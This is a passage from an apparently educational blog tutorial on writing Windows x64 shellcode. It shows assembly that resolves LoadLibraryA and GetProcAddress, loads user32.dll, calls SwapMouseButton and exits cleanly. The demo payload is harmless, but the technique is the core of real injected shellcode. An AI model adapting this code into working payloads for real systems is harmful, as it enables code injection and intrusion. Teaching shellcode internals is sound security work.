xor rdx, rdx               ; RDX = 0
mov edx, [rsi + rcx * 4]   ; EDX = Pointer(offset)
add rdx, rbx               ; RDX = GetProcAddress
mov rdi, rdx               ; Save GetProcAddress in RDI

Please note that this has to be done carefully. Some structures from the PE file are not 8 bytes, while we need in the end 8 bytes pointers. This is why in the code above there are registers such as ESI or CX used.

Find the address of LoadLibraryA

Since we have the address of GetProcAddress and the base address of kernel32.dll, we can use them to call GetProcAddress(kernel32.dll, “LoadLibraryA”) and find the address of LoadLibraryA function.

However, it is something important we need to be careful about: we will use the stack to place our strings (e.g. “LoadLibraryA”) and this might break the stack alignment, so we need to make sure it is 16 bytes alligned. Also, we must not forget about the stack space that we need to allocate for a function call, because the function we call might use it. So, we need to place our string on the stack and just after this to allocate space for the function we call (e.g. GetProcAddress).

Finding the address of LoadLibraryA is pretty straightforward:

; Use GetProcAddress to find the address of LoadLibrary

mov rcx, 0x41797261          ; aryA
push rcx                     ; Push on the stack
mov rcx, 0x7262694c64616f4c  ; LoadLibr
push rcx                     ; Push on stack
mov rdx, rsp                 ; LoadLibraryA
mov rcx, rbx                 ; kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for LoadLibrary string
mov rsi, rax                 ; LoadLibrary saved in RSI

We put the “LoadLibraryA” string on the stack, setup RCX and RDX registers, allocate space on the stack for the function call, call GetProcAddress and cleanup the stack. As a result, we will store the LoadLibraryA address in the RSI register.

Load user32.dll using LoadLibraryA

Since we have the address of LoadLibraryA function, it is pretty simple to call LoadLibraryA(“user32.dll”) to load user32.dll and find out its base address which will be returned by LoadLibraryA.

mov rcx, 0x6c6c               ; ll
push rcx                      ; Push on the stack
mov rcx, 0x642e323372657375   ; user32.d
push rcx                      ; Push on stack
mov rcx, rsp                  ; user32.dll
sub rsp, 0x30                 ; Allocate stack space for function call
call rsi                      ; Call LoadLibraryA
add rsp, 0x30                 ; Cleanup allocated stack space
add rsp, 0x10                 ; Clean space for user32.dll string
mov r15, rax                  ; Base address of user32.dll in R15

The function will return the base address of the user32.dll module into RAX and we will save it in the R15 register.

Find the address of SwapMouseButton function

We have the address of GetProcAddress, the base address of user32.dll and we know the function is called “SwapMouseButton”. So we just need to call GetProcAddress(user32.dll, “SwapMouseButton”);

Please note that when we allocate space on stack for the function call, we do not allocate anymore 0x30 (48) bytes, we allocate only 0x28 (40) bytes. This is because to place our string (“SwapMouseButton”) on the stack we use 3 PUSH instructions, so we get 0x18 (24) bytes of data, which is not a multiple of 16. So we use 0x28 instead of 0x30 to align the stack to 16 bytes.

; Call GetProcAddress(user32.dll, "SwapMouseButton")

xor rcx, rcx                  ; RCX = 0
push rcx                      ; Push 0 on stack
mov rcx, 0x6e6f7474754265     ; eButton
push rcx                      ; Push on the stack
mov rcx, 0x73756f4d70617753   ; SwapMous
push rcx                      ; Push on stack
mov rdx, rsp                  ; SwapMouseButton
mov rcx, r15                  ; User32.dll base address
sub rsp, 0x28                 ; Allocate stack space for function call
call rdi                      ; Call GetProcAddress
add rsp, 0x28                 ; Cleanup allocated stack space
add rsp, 0x18                 ; Clean space for SwapMouseButton string
mov r15, rax                  ; SwapMouseButton in R15

GetProcAddress will return in RAX the address of SwapMouseButton function and we will save it into R15 register.

Call SwapMouseButton

Well, we have its address, it should be pretty easy to call it. We do not have any issue as we previously cleaned up and we do not need to alter the stack in this function call. So we just set the RCX register to 1 (meaning true) and call it.

; Call SwapMouseButton(true)

mov rcx, 1    ; true
call r15      ; SwapMouseButton(true)

Find the address of ExitProcess function

As we already did before, we use GetProcAddress to find the address of ExitProcess function exported by the kernel32.dll. We still have the kernel32.dll base address in RBX (which is a nonvolatile register and this is why it is used) so it is simple:

; Call GetProcAddress(kernel32.dll, "ExitProcess")

xor rcx, rcx                 ; RCX = 0
mov rcx, 0x737365            ; ess
push rcx                     ; Push on the stack
mov rcx, 0x636f725074697845  ; ExitProc
push rcx                     ; Push on stack
mov rdx, rsp                 ; ExitProcess
mov rcx, rbx                 ; Kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for ExitProcess string
mov r15, rax                 ; ExitProcess in R15

We save the address of ExitProcess function in R15 register.

ExitProcess

Since we do not want to let the process to crash, we can “gracefully” exit by calling the ExitProcess function. We have the address, the stack is aligned, we have just to call it.

; Call ExitProcess(0)

mov rcx, 0     ; Exit code 0
call r15       ; ExitProcess(0)

Conclusion

There are many articles about Windows shellcode development on x64, such as this one or this one, but I just wanted to tell the story my way, following the previously written articles.

The shellcode is far away from being optimized and it also contains NULL bytes. However, both of these limitations can be improved.

Shellcode development is fun and swithing from x86 to x64 is needed, because x86 will not be used too much in the future.

Or course, I will add support for Windows x64 in Shellcode Compiler.

If you have any question, please add a comment or contact me.